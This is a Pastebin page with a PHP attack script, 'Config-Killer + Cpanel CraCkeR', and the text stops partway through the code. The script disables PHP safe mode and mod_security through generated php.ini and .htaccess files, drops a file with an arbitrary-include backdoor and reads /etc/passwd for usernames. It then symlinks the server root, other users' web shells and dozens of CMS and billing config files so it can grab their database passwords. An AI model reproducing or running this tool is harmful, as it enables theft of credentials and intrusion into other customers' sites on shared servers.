EddieKidiw

Config-Killer + Cpanel CraCkeR

Jan 13th, 2016
336
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 44.73 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4.  
  5. $head = '
  6. <html>
  7. <head>
  8. </script>
  9.  
  10.  
  11.  
  12. <STYLE>
  13. body {
  14. font-family: Tahoma
  15. }
  16. tr {
  17. BORDER: dashed 1px #00ff00;
  18. color: #00ff00;
  19. }
  20. td {
  21. BORDER: dashed 1px #00ff00;
  22. color: #00ff00;
  23. }
  24. .table1 {
  25. BORDER: 0px Black;
  26. BACKGROUND-COLOR: Black;
  27. color: #00ff00;
  28. }
  29. .td1 {
  30. BORDER: 0px;
  31. BORDER-COLOR: #00ff00;
  32. font: 7pt Verdana;
  33. color: Green;
  34. }
  35. .tr1 {
  36. BORDER: 0px;
  37. BORDER-COLOR: #00ff00;
  38. color: #00ff00;
  39. }
  40. table {
  41. BORDER: dashed 1px #00ff00;
  42. BORDER-COLOR: #00ff00;
  43. BACKGROUND-COLOR: Black;
  44. color: #00ff00;
  45. }
  46. input {
  47. border          : solid 3px ;
  48. border-color        : #00ff00;
  49. BACKGROUND-COLOR: white;
  50. font: 11pt Verdana;
  51. color: #00ff00;
  52. }
  53. select {
  54. BORDER-RIGHT:  Black 1px solid;
  55. BORDER-TOP:    #00ff00 1px solid;
  56. BORDER-LEFT:   #00ff00 1px solid;
  57. BORDER-BOTTOM: Black 1px solid;
  58. BORDER-color: #00ff00;
  59. BACKGROUND-COLOR: Black;
  60. font: 8pt Verdana;
  61. color: Red;
  62. }
  63. submit {
  64. BORDER:  buttonhighlight 2px outset;
  65. BACKGROUND-COLOR: Black;
  66. width: 30%;
  67. color: #00ff00;
  68. }
  69. textarea {
  70. border          : dashed 1px #00ff00;
  71. BACKGROUND-COLOR: Black;
  72. font: Fixedsys bold;
  73. color: #00ff00;
  74. }
  75. BODY {
  76.     SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #00ff00; SCROLLBAR-SHADOW-color: #00ff00; SCROLLBAR-3DLIGHT-color: #00ff00; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #00ff00; SCROLLBAR-DARKSHADOW-color: #00ff00
  77. margin: 1px;
  78. color: Red;
  79. background-color: Black;
  80. }
  81. .main {
  82. margin          : -287px 0px 0px -490px;
  83. BORDER: dashed 1px #00ff00;
  84. BORDER-COLOR: #00ff00;
  85. }
  86. .tt {
  87. background-color: Black;
  88. }
  89.  
  90. A:link {
  91.     COLOR: White; TEXT-DECORATION: none
  92. }
  93. A:visited {
  94.     COLOR: White; TEXT-DECORATION: none
  95. }
  96. A:hover {
  97.     color: Red; TEXT-DECORATION: none
  98. }
  99. A:active {
  100.     color: Red; TEXT-DECORATION: none
  101. }
  102. </STYLE>
  103. <script language=\'javascript\'>
  104. function hide_div(id)
  105. {
  106.  document.getElementById(id).style.display = \'none\';
  107.  document.cookie=id+\'=0;\';
  108. }
  109. function show_div(id)
  110. {
  111.  document.getElementById(id).style.display = \'block\';
  112.  document.cookie=id+\'=1;\';
  113. }
  114. function change_divst(id)
  115. {
  116.  if (document.getElementById(id).style.display == \'none\')
  117.    show_div(id);
  118.  else
  119.    hide_div(id);
  120. }
  121. </script>'; ?>
  122. <html>
  123.  
  124. <title>Config-Killer + Cpanel  CraCkeR</title>
  125. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  126.  
  127.  
  128.  
  129. <p align="center">
  130. <img border="0" src="http://www.alm3refh.com/images/groupxp.gif" width="426" height="169"></p>
  131.     <head>
  132.  
  133. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
  134. <form method=post><font color=white size=2 face="comic sans ms">KICK SAFE MODE</font><br>
  135. <input type=submit name=ini value="Generate PHP.ini / ini.php / .htaccess" /></form>
  136. <?php
  137.     if(isset($_POST['ini']))
  138.     {
  139.        
  140.        
  141.        
  142.         $yamini=fopen('php.ini','w+') or die("can't open file");
  143.         $rr=" safe_mode=Off\n short_open_tag = On\n log_errors = On\n log_errors_max_len = 1024\n ignore_repeated_errors = On\n magic_quotes_runtime = Off\n magic_quotes_gpc = On\n AddHandler application/x-httpd-php4 .php\n display_errors = Off\n disable_functions=Bypassed_By_Yamraaj-IHOS\n safe_mode_gid=Off\n open_basedir=Off\n register_globals=on\n exec=On\n shell_exec=On\n allow_url_fopen=On ";
  144.         fwrite($yamini,$rr);
  145.        
  146.         $yamhtm = fopen("ihos.html", "w+") or die("can't open file");
  147.         fwrite($yamhtm, "<title>404 Not Found</title>\n");
  148.        
  149.         $yamhtm1 = fopen("group.html", "w+") or die("can't open file");
  150.         fwrite($yamhtm1, "<body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle your fucking request lol.</p><iframe src=\"ip.php\" title=\"404 not found\" width=\"10\" height=\"10\" style=\"visibility:hidden;position:absolute;left:0;top:0;\"></iframe></body>\n");
  151.        
  152.         $yamht = fopen(".htaccess", "w+");
  153.         fwrite($yamht, "#[YAM] here ..go FUCK your self
  154. Options +Indexes
  155. DirectoryIndex yam.html
  156. IndexIgnore ini.php ihos.html group.html
  157. ErrorDocument 404 /group.html
  158. RedirectMatch 404 ^/maachodporkies/.*$                 
  159. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  160. HeaderName ihos.html
  161. ReadmeName group.html
  162. <IfModule mod_security.c>
  163.                     SecFilterEngine Off
  164.                      SecFilterScanPOST Off
  165.                     </IfModule>\n\r");
  166.        
  167.         $yaminiphp = fopen("ini.php", "w+");
  168.         fwrite($yaminiphp, "<?
  169. echo ini_get(\"safe_mode\");
  170. echo ini_get(\"open_basedir\");
  171. include(\$_GET[\"file\"]);
  172. ini_restore(\"safe_mode\");
  173. ini_restore(\"open_basedir\");
  174. echo ini_get(\"safe_mode\");
  175. echo ini_get(\"open_basedir\");
  176. include(\$_GET[\"ss\"]);
  177. ?>");
  178.        
  179.         $link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to view PHP.INI</u></font></a>";
  180.         echo $link;
  181.        
  182.        
  183.         }
  184.    
  185.    
  186.    
  187.     ?>
  188. <div align=center><table width=100% border=1><tr><td align=center></td></tr></table>
  189. <form method=post>
  190. <font color=white size=2 face="comic sans ms">MANUAL SYMLINK<br><input type=submit name=man value="Open Manual symlink form"><p></form>
  191.     <?php
  192.     if(isset($_POST['man']))
  193. {  
  194. ?>
  195. <form method=post>file link that you want symlink:-<input type=text name=dli value="/home/user/public_html/config.php">&nbsp file name with  which you want represent symlink :-<input type=text name=fna value="owned.txt"><br>use .txt(owned.txt) or no extension(owned)  for file which will represent symlink<br><br><input type=submit name=manual value="maar le >.<"></form>
  196. <?php  
  197. }  
  198.     ?>
  199.     <?php
  200.     error_reporting(0);
  201.     if(isset($_POST['manual']))
  202.     {
  203.     $dlink=trim($_POST['dli']);
  204.      $fna=trim($_POST['fna']);
  205.      mkdir('group',0777);
  206.     $rr  = "Options Indexes FollowSymLinks\nOptions all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  207. $g = fopen('group/.htaccess','w');
  208. fwrite($g,$rr);
  209. $final="group/".$fna;
  210. symlink($dlink,$final);
  211.      
  212. echo "<br>bhaiyu maine ".$dlink." ko jahaan symlink kiya, uska link==> <a href=".$final."><font color=red size=3>is here</font></a>";
  213. }
  214.     ?><p><div align=center><table width=100% border=1><tr><td align=center></td></tr></table>
  215.    
  216.     <form method=post>
  217. <font color=white size=3 face="comic sans ms">406 error bypasser on public_html folder <br><input type=submit name=4 value="ghuma de billu x-("><p></form>
  218.     <?php
  219.     if(isset($_POST['4']))
  220. {  
  221. mkdir('group.ihos',0777);
  222.     $rr  = "<body bgcolor=black><center><font color=white size=2 > SANIYA KI BARAT ME AAYA HAI KYA </font><br><img src='http://www.alm3refh.com/images/groupxp.gif'>";
  223. $g = fopen('group.ihos/index.html','w');
  224. fwrite($g,$rr);
  225. $r="group.ihos/";
  226. $users=file("/etc/passwd");
  227. foreach($users as $user)
  228. {
  229. $str=explode(":",$user);
  230. $us=$str[0];
  231.  
  232.  
  233.                      }
  234. echo '<br>bhaiyu check this directory for all symlinked users public_html directory with 406 error bypassed  ==> <a href="group.ihos/"><font color=red size=4><u>group.ihos</u></font></a>';
  235. }
  236.     ?>
  237.    
  238.     <p><div align=center><table width=100% border=1><tr><td align=center></td></tr></table>
  239.    
  240. <font color=white size=2 face="comic sans ms">Automated mass symlink wala jugaad </font><br><font color=white size=2 face="comic sans ms"> Root dir aur configs toh free hai </font><br><font color=white size=2 face="comic sans ms">  Server me jitna shell hai wo bhi dikhayega</font>
  241. <form method=post>
  242.     <input type=submit name="usre" value="use to Extract usernames" /></form>
  243.    
  244.    
  245.    
  246.    
  247.     <?php
  248.     if(isset($_POST['usre'])){
  249.         ?><form method=post>
  250.     <textarea rows=10 cols=50 name=user><?php  $users=file("/etc/passwd");
  251. foreach($users as $user)
  252. {
  253. $str=explode(":",$user);
  254. echo $str[0]."\n";
  255. }
  256.  
  257. ?></textarea><br><br>
  258.     <input type=submit name=su value="bhaiyu ^_^ .. lets start" /></form>
  259.     <?php } ?>
  260.     <?php
  261.     error_reporting(0);
  262.     echo "<font color=red size=2 face=\"comic sans ms\">";
  263.     if(isset($_POST['su']))
  264.     {
  265.     mkdir('group.txt',0777);
  266. $rr  = "Options Indexes FollowSymLinks\nOptions all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  267. $g = fopen('group.txt/.htaccess','w');
  268. fwrite($g,$rr);
  269. $groupshell = symlink("/","group.txt/root");
  270.             $rt="<a href=group.txt/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
  271.         echo "check link given below for / folder symlink <br><u>$rt</u>";
  272.        
  273.        
  274.             $dir=mkdir('group.shell',0777);
  275.         $r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \nIndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble \n Require None \n Satisfy Any";
  276.         $f = fopen('group.shell/.htaccess','w');
  277.    
  278.         fwrite($f,$r);
  279.         $consym="<a href=group.shell/><font color=white size=3 face=\"comic sans ms\">shells & defaces</font></a>";
  280.         echo "<br>shell and deface by other hackers in whole server <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  281.        
  282.             $usr=explode("\n",$_POST['user']);
  283.         $configuration=array("adminfinder.php","AK-74.php","Ani-Shell.php","antichat.php","ASP.php","aspx.php","auto.php","ayyildiz.php","aZRaiLPhp.php","backupsql.php","c0derz.php","CasuS.php","cihshell.php","CTT.php","CWShellDumper.php","CyberSpy5.php","d3v1l5c4f3.php","dbman.php","dC3.php","dq.php","Dx.php","DxShell.php","EFSO.php","eg.php","ekin0x.php","elmaliseker.php","Evilc0der.php","fso.php","ftp.php","gamma.php","GFS.php","gfs_sh.php","go-shell.php","h4ntu.php","hackrich.php","hiddens.php","ida.php","if.php","image.php","iMHaBiRLiGi.php","iMHaPFtp.php","indexer.php","ironshell.php","KA.php","kacak.php","kayredmoon.php","klasvayv.php","lamashell.php","liz0zim.php","load_shell.php","Loaderz.php","localhost.php","log.php","login.php","Macker.php","madspot_shell.php","matamu.php","me64.php","MGZ.php","Miller.php","MyShell.php","mysql.php","MYSql.php","mysql_tool.php","mysqlwebsh.php","NCC-Shell.php","Netcat.php","NetworkFileManagerPHP.php","NFM.php","NGH.php","NIX.php","nshell.php","nstview.php","NTDaddy.php","nsuser.php","Oops.php","PHVayv.php","PHANTASMA.php","PHPShell.php","php.php","php-backdoor.php","php-include-w-shell.php","pHpINJ.php","PHPJackal.php","phpRemoteView.php","PhpSpy.php","PHVayv.php","PostShell.php","Predator.php","Private-i3lue.php","PRiV8.php","pws.php","r00t.php","reader.php","redcod.php","RemExp.php","remview_fix.php","rootshell.php","ru24_post_sh.php","s72.php","Safe_Mode.php","safe0ver.php","saudi_sh3ll.php","send.php","ShAnKaR.php","simattacker.php","simple_cmd.php","simple-backdoor.php","SimShell.php","Sincap.php","sa_3.php","SnIpEr_Sa.php","sosyete.php","South.php","sql.php","STNC.php","symlink_urduhack.php","t5.php","tero.php","thebaron.php","tryag.php","up.php","urduhack.php","Uploader.php","vb.php","web-shell.php","WinX.php","wso_shell.php","wso2.php","zacosmall.php","zehir4.asp","zehir4.php","ZyklonShell.php","c99.php","c100.php","r57.php","b374k.php","c22.php","symlink_sa.php","webr00t.php","cpanel.php","wso.php","404.php","aarya.php","greenshell.php","ddos.php","madspot.php","1337.php","31337.php","WSO.php","bc.php","cpn.php","sh3ll.php","dz0.php","whcms.php","gaza.php","d0mains.php","changeall.php","h4x0r.php","L3b.php","uploads.php","cmd.php","shell.asp","cmd.asp","sh3ll.asp","b374k-2.2.php","m1n1.php","b374km1n1.php","MCA.php","madspoit.php","error_log.php","error_logs.php","error.php","madz.php","mad.php","mad2.php","4041.php","D.php","anon.php",".mm.php","hacking Sec.php","s3.php","anonymous.php","Ch3rn0by1.php","strt123.php","madspotshell.php","sh3lla.php","priv8.php","private.php","cp.php","x.php",".php","cpbrute.php","hacked.php","wso24.php","wso26.php","wso404.php","sym.php","symsa2.php","sym3.php","sym4.php","whmcs.php","um3rh.php","whmcskiller.php","cracker.php","1.php","2.php","database.php","a.php","d.php","dz.php","system.php","um3r.php","zone-h.php","root.php","loveajkal.php","doom.php","dam.php","killer.php","user.php","sh3ll3d.php","uploader.php","xd.php","d00.php","h4xor.php","kinoz.php","TTzone.php","pak.php","w.php","dom.php","d.php","oops.php?","web.php","spider.php","upload.php","shelled.php","sh3lled.php","pce.php","PCE.php","3.php","sym1.php","pakshell.php","saz.php","myc99.php","bca.php","mca.php","wellcome.php","Symlink.php","symlink.php","domains.php","cpbt.php","jowp.php","B-F.php","lol.php","hack.php","dhan.php","dhanush.php","php.ini","ini.php","wss.php","dk.php","Log.php","legal.php","I-47.php","merashell.php","b.php","insta!l.php","xx.php","box.php","b0x.php","jinx.php","asd.php","TCS.php","tcs.php","team.php","love.php","webadmin.php","devil.php","UChaNK.php","sst.php","dh.php","black.php","404en.php","angel.php","m4d.php","symsa3.php","unlimit-sym.php","403.php","haxor.php","Symlink_Sa3.php","immi.php","thsh3ll.php","SM()K3RZ!.php","mcs.php","ck.php","dmass.php","class.php","wpm.php","codacker.php","data.php",".12345.php","confkiller.php","wp-bt.php","haxseeker.php","wso_immi.php","helix.php","akky.php","yele.php","mc.php","db.php","Webr00t.php","mad_immi.php","immi_sa.php","GX.php","upload.phtml","whm.php","whm1.php","whmfckr.php","whmkiller.php","BNT Shell.php","BNTShell.php","BNT.php","bnt.php","cok.php","inject.php","injection.php","Xinject.php","x0rg-Bypass.php","cgi.php","Crystal.php","FSO.php","gfs.php","lama.php","massdeface.php","mass.php","k.php","kk.php","bp.php","bypass.php","cp.php","cpanel.php","domains.php","don3.php","ep.php","etx.php","ftp.php","hulk.php","groupshell.php","inx.php","killer3.php","mannu.php","mannu1.php","mannumod.php","modebp.php","no.php","rr.php","rr2.php","symkiller.php","ts.php","ts1.php","tttt.php","w.php","w2.php","cof.pl","cgishell.pl","allsoft.pl","user.pl","config.pl","MCA.html","ittihad.html","x.html","y.html","3xp1r3.html","deface.html","defaced.html","AlphaCop.html","mca.html","Tcs.html","root.html","r00t.html","lol.html","pce.html","pce.html","bca.html","y.htm","x.htm","3xp1r3.htm","x.txt","COOKIE.txt","wp.txt","joomla.txt","passwd.txt","named.txt","login.txt","password.txt","ftp.txt");
  284.         foreach($usr as $uss )
  285.         {
  286.             $us=trim($uss);
  287.                        
  288.             foreach($configuration as $c)
  289.             {
  290.              $rs="/home/".$us."/public_html/".$c;
  291.              $r="group.shell/".$us." .. ".$c;
  292.              symlink($rs,$r);
  293.            
  294.         }
  295.            
  296.             }
  297.        
  298.        
  299.        
  300.         $dir=mkdir('group.conf',0777);
  301.         $r  = "Options Indexes FollowSymLinks\nOptions all \n DirectoryIndex group.html  \n   Require None \n Satisfy Any";
  302.         $f = fopen('group.conf/.htaccess','w');
  303.    
  304.         fwrite($f,$r);
  305.         $consym="<a href=group.conf/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  306.         echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  307.        
  308.             $usr=explode("\n",$_POST['user']);
  309.        
  310.         foreach($usr as $uss )
  311.         {
  312.             $us=trim($uss);
  313.                        
  314.             $r="group.conf/";
  315.              symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  316.         symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  317.         symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  318.         symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  319.         symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  320.         symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomlablog');
  321.         symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  322.         symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  323.         symlink('/home/'.$us.'/public_html/forum/includes/config.php',$r.$us.'..vbforum');
  324.         symlink('/home/'.$us.'/public_html/cc/includes/config.php',$r.$us.'..vbcc');
  325.         symlink('/home/'.$us.'/public_html/connect.php',$r.$us.'..connect');
  326.         symlink('/home/'.$us.'/public_html/mk_conf.php',$r.$us.'..mk-portale1');
  327.         symlink('/home/'.$us.'/public_html/include/config.php',$r.$us.'..Marketecture');
  328.         symlink('/home/'.$us.'/public_html/includes/functions.php',$r.$us.'..phpbb3');
  329.         symlink('/home/'.$us.'/public_html/include/db.php',$r.$us.'..infinity');
  330.         symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..invisio');
  331.         symlink('/home/'.$us.'/public_html/forum/conf_global.php',$r.$us.'..forumconfglobal');
  332.         symlink('/home/'.$us.'/public_html/forums/conf_global.php',$r.$us.'..forumsconf_global');
  333.         symlink('/home/'.$us.'/public_html/forums/config.php',$r.$us.'..forumsconfig');
  334.         symlink('/home/'.$us.'/public_html/forum/config.php',$r.$us.'..forumconfig');
  335.         symlink('/home/'.$us.'/public_html/includes/sql.php',$r.$us.'..InculdeSql');
  336.         symlink('/home/'.$us.'/public_html/lib/config.php',$r.$us.'..LibConfig');
  337.         symlink('/home/'.$us.'/public_html/lib/db.php',$r.$us.'..LibDb');
  338.         symlink('/home/'.$us.'/public_html/db.php',$r.$us.'..Db');
  339.         symlink('/home/'.$us.'/public_html/shop/config.php',$r.$us.'..ShopConfig');
  340.         symlink('/home/'.$us.'/public_html/dbconnect.php',$r.$us.'..dbconnect');
  341.         symlink('/home/'.$us.'/public_html/dbc.php',$r.$us.'..dbc');
  342.         symlink('/home/'.$us.'/public_html/includes/dbc.php',$r.$us.'..Includedbc');
  343.         symlink('/home/'.$us.'/public_html/includes/dbconnect.php',$r.$us.'..Includedbconnect');       
  344.         symlink('/home/'.$us.'/public_html/admincp/config.inc',$r.$us.'..config.inc'); 
  345.         symlink('/home/'.$us.'/public_html/mycp/config/functions/db.php',$r.$us.'..mycpDb');   
  346.         symlink('/home/'.$us.'/public_html/include/connection.php',$r.$us.'..connection'); 
  347.         symlink('/home/'.$us.'/public_html/webpanel/config.inc.php',$r.$us.'..WebpanelConfigInc'); 
  348.         symlink('/home/'.$us.'/public_html/include/config.inc.php',$r.$us.'..CopperminePhotoGallery'); 
  349.         symlink('/home/'.$us.'/public_html/conf/_basic_config.php',$r.$us.'..B2Evolution');
  350.         symlink('/home/'.$us.'/public_html/inc/header.inc.php',$r.$us.'..BoonexDolphin');  
  351.         symlink('/home/'.$us.'/public_html/config/site.php',$r.$us.'..Concrete5CS');   
  352.         symlink('/home/'.$us.'/public_html/site/config.php',$r.$us.'..Concrete5SC');   
  353.         symlink('/home/'.$us.'/public_html/includes/global.inc.php',$r.$us.'..CubeCart');  
  354.         symlink('/home/'.$us.'/public_html/e107_config.php',$r.$us.'..e107');  
  355.         symlink('/home/'.$us.'/public_html/faq_config.php',$r.$us.'..FAQMasterFlex');  
  356.         symlink('/home/'.$us.'/public_html/db-config.php',$r.$us.'..GeeklogDBC');  
  357.         symlink('/home/'.$us.'/public_html/siteconfig.php',$r.$us.'..GeeklogSiteC');   
  358.         symlink('/home/'.$us.'/public_html/lib-common.php',$r.$us.'..GeeklogLibCom');  
  359.         symlink('/home/'.$us.'/public_html/private/db-config.php',$r.$us.'..glfusion');
  360.         symlink('/home/'.$us.'/public_html/hotaru_settings.php',$r.$us.'..Hotaru');
  361.         symlink('/home/'.$us.'/public_html/livesite/config.php',$r.$us.'..LiveSite');
  362.         symlink('/home/'.$us.'/public_html/config/config.properties.php',$r.$us.'..LifeType');
  363.         symlink('/home/'.$us.'/public_html/app/etc/local.xml',$r.$us.'..Magento');
  364.         symlink('/home/'.$us.'/public_html/manager/includes/config.inc.php',$r.$us.'..MODx');
  365.         symlink('/home/'.$us.'/public_html/app/config.php',$r.$us.'..NoahsClassifieds');
  366.         symlink('/home/'.$us.'/public_html/info.php',$r.$us.'..ocPortal');
  367.         symlink('/home/'.$us.'/public_html/ow_includes/config.php',$r.$us.'..Oxwall');
  368.         symlink('/home/'.$us.'/public_html/mysql.class.php',$r.$us.'..phpFormGenerator');
  369.         symlink('/home/'.$us.'/public_html/mysql.php',$r.$us.'..phpFormGenerator');
  370.         symlink('/home/'.$us.'/public_html/mysql-db.php',$r.$us.'..phpFormGenerator');
  371.         symlink('/home/'.$us.'/public_html/config/config.php',$r.$us.'..PHPlist');
  372.         symlink('/home/'.$us.'/public_html/defaults.php',$r.$us.'..phpMyDirectory');
  373.         symlink('/home/'.$us.'/public_html/include/inc_conf/conf.inc.php',$r.$us.'..phpWCMS');
  374.         symlink('/home/'.$us.'/public_html/conf/config.php',$r.$us.'..phpWebSite');
  375.         symlink('/home/'.$us.'/public_html/lib/config.php',$r.$us.'..PhpWikiLibcon');
  376.         symlink('/home/'.$us.'/public_html/libs/dbconnect.php',$r.$us.'..Pligg');
  377.         symlink('/home/'.$us.'/public_html/config/dbconnect.php',$r.$us.'..ConfigDbconnect');
  378.         symlink('/home/'.$us.'/public_html/sohoadmin/config/isp.conf.php',$r.$us.'..Soholaunch');
  379.         symlink('/home/'.$us.'/public_html/textpattern/config.php',$r.$us.'..Textpattern');    
  380.         symlink('/home/'.$us.'/public_html/db/local.php',$r.$us.'..TikiWiki');     
  381.         symlink('/home/'.$us.'/public_html/typo3conf/localconf.php',$r.$us.'..TYPO3');     
  382.         symlink('/home/'.$us.'/public_html/mainfile.php',$r.$us.'..Xoops');    
  383.         symlink('/home/'.$us.'/public_html/zp-data/zenphoto.cfg',$r.$us.'..Zen Photo');
  384.         symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..MyBB');
  385.         symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..Phpbb');
  386.         symlink('/home/'.$us.'/public_html/forum/includes/config.php',$r.$us.'..Phpbb-forum');
  387.         symlink('/home/'.$us.'/public_html/forums/includes/config.php',$r.$us.'..Phpbb-forums');
  388.         symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Smf');
  389.         symlink('/home/'.$us.'/public_html/settings.php',$r.$us.'..smf');
  390.         symlink('/home/'.$us.'/public_html/includes/settings.php',$r.$us.'..WebCalendar');     
  391.         symlink('/home/'.$us.'/public_html/config/settings.php',$r.$us.'..ConfigSettings');
  392.         symlink('/home/'.$us.'/public_html/config/settings.inc.php',$r.$us.'..PrestaShop');
  393.         symlink('/home/'.$us.'/public_html/forum/Settings.php',$r.$us.'..forumSettings');
  394.         symlink('/home/'.$us.'/public_html/forums/Settings.php',$r.$us.'..forumsSettings');
  395.         symlink('/home/'.$us.'/public_html/site/default/settings.php',$r.$us.'..Drupal');
  396.         symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..Drupals');
  397.         symlink('/home/'.$us.'/public_html/admin/conf.php',$r.$us.'..AdminConf');
  398.         symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..OpenCart');
  399.         symlink('/home/'.$us.'/public_html/admin/includes/configure.php',$r.$us.'..osCommerceAdmin');
  400.         symlink('/home/'.$us.'/public_html/includes/configure.php',$r.$us.'..osCommerce');
  401.         symlink('/home/'.$us.'/public_html/forms/admin/config.inc.php',$r.$us.'..phpFreeChat');
  402.         symlink('/home/'.$us.'/public_html/admin.php',$r.$us.'..PhpWikiAdmin');
  403.         symlink('/home/'.$us.'/public_html/includes/configure.php',$r.$us.'..ShopSite-TomatoCart-ZenCart');
  404.         symlink('/home/'.$us.'/public_html/admin/includes/configure.php',$r.$us.'..ShpSite-TmtCart-ZenCart');
  405.         symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..Whm');
  406.         symlink('/home/'.$us.'/public_html/whmc/configuration.php',$r.$us.'..Whmc');
  407.         symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..Whmc-Supp');
  408.         symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..Whmcs-Cli');
  409.         symlink('/home/'.$us.'/public_html/billings/configuration.php',$r.$us.'..Whmcs-blis');
  410.         symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..Whmcs-bil');
  411.         symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..Whmcs-clis');
  412.         symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..Whmcs-clies');
  413.         symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..Whmcs-clie');
  414.         symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..Whmcs-csup');
  415.         symlink('/home/'.$us.'/public_html/whmcs/WHM/configuration.php',$r.$us.'..Whmcs-WHM');
  416.         symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..Whmc-WHM');
  417.         symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whm-WHMCS');
  418.         symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..whm-whmcs');
  419.         symlink('/home/'.$us.'/public_html/hosting/configuration.php',$r.$us.'..Whm-Hosting');
  420.         symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..Whmcs');
  421.         symlink('/home/'.$us.'/public_html/order/configuration.php',$r.$us.'..Whmcs-Order');
  422.                         }
  423.                 }
  424.     ?>
  425.  
  426. <?php
  427. //////////////////////////////////////
  428. /////password grabbing section////////
  429. //////////////////////////////////////
  430. ?>
  431.  
  432. <form method=post>
  433.         <input type=submit name=select value="khul ja config se password nikalne wala graber ">
  434.         </form>
  435.        
  436.     <?php
  437.     if(isset($_POST['select']))
  438.     {
  439.         ?><div align=center>
  440.     <font color=#ff9933 size=2 face="comic sans ms">checkmark configuration files, for those you want to grab passwords
  441.  <table width=30% >
  442.      <tr>
  443.          <td align=right width=50%>
  444.              <br>
  445.  <font color=red size=3>
  446.      wordpress => <br>
  447.      joomla => <br>
  448.      whmcs =><br>
  449.      VBulletin => <br>
  450.      unknown => <br>
  451.      ftp(joomla) => <br>
  452.      <br>
  453.  </td>
  454.  <td align=left >
  455.      <form method="post"><br>
  456. <input type="checkbox" name="config[]" value="wp"><br>
  457. <input type="checkbox" name="config[]" value="joomla"><br>
  458. <input type="checkbox" name="config[]" value="whmcs"><br>
  459. <input type="checkbox" name="config[]" value="vb"><br>
  460. <input type="checkbox" name="config[]" value="other"><br>
  461. <input type="checkbox" name="config[]" value="jftp"><br>
  462. </td>
  463.      </tr>
  464.            </table><br>
  465. <input type="submit" name=sm value="billu..Hit this server.. hard " />
  466. </form>
  467. <p>
  468.     <?php
  469. }
  470. ?>
  471. <?php
  472.  
  473. set_time_limit(0);
  474.  
  475. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  476. {
  477.  
  478. $ar0=explode($marqueurDebutLien, $text);
  479. $ar1=explode($marqueurFinLien, $ar0[1]);
  480. $ar=trim($ar1[0]);
  481. return $ar;
  482. }
  483.  
  484. function data($lu)
  485. {
  486.     $ch = curl_init();
  487.  
  488. curl_setopt($ch, CURLOPT_URL, $lu);
  489. curl_setopt($ch, CURLOPT_HEADER, 1);
  490. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  491. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  492. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  493. $result['EXE'] = curl_exec($ch);
  494. curl_close($ch);
  495. return $result['EXE'];
  496.    
  497. }
  498.  
  499.  
  500.  
  501.       if(isset($_POST['sm']))
  502.         {
  503. ////////////////
  504. ///file opener//
  505. ////////////////   
  506. $ffile=fopen('P-list.txt','a+');
  507.  
  508. //////////////////////
  509. //symlink directory///
  510. //////////////////////
  511.  $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/group.conf/";
  512. $re=$r;
  513.  
  514. ////////////////////////
  515. ///username extractor///
  516. ////////////////////////
  517. if(!empty($_POST['config']))
  518.                 {
  519.  
